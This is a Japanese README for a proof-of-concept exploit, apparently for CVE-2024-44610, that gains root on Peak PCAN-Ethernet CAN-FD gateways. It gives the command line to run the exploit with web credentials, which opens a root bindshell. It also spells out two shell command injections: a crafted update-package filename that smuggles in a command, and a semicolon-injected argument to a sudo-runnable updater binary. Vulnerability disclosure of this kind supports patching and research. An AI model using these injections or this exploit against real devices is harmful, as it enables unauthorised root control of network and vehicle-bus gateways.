
CVE-2024-44610: Peak PCAN-Ethernet CAN-(FD)ゲートウェイの認証済みリモートルートエクスプロイト
このリポジトリには、Peak Ethernetゲートウェイ上でrootとしてコードを実行するProof-of-Concept(PoC)エクスプロイトが含まれています。これを使用するには、Webインターフェースの認証情報を知っている必要があります。
ベンダーは迅速に修正済みファームウェアを提供しています:
Golangを使用してプログラムをコンパイルし、次のように実行します:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
エクスプロイトが成功すると、デバイス上でrootとしてbindshellが起動します。このページの下部に2つのスクリーンショットがあります。
オプションの意味は次のとおりです:
非FDバージョンも脆弱ですが、これらのデバイスは署名付きファームウェアアップデートを実装していないため、独自の改変ファームウェアをアップロードできるため、実際的な重要性は低いです。
2つのシェルコマンドインジェクションの脆弱性が利用されています:
Webインターフェースにアップロードされるアップデートパッケージのファイル名にシェルコマンドを含めることが可能です。例:
test';ping 1.1.1.1;'.raucb
コマンドはウェブサーバーを実行するwww-dataユーザーとして実行されます。ファイル名は適切な拡張子(デバイスによってtarまたはraucb)である必要があります。
このバイナリは、指定されたファイル名が存在する限り、内部的にsystemを実行します。次のようにして悪用できます:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
このバイナリはsudo経由で実行できるため、rootとしてコマンドを実行することが可能です。
FDデバイス:

非FDデバイス:
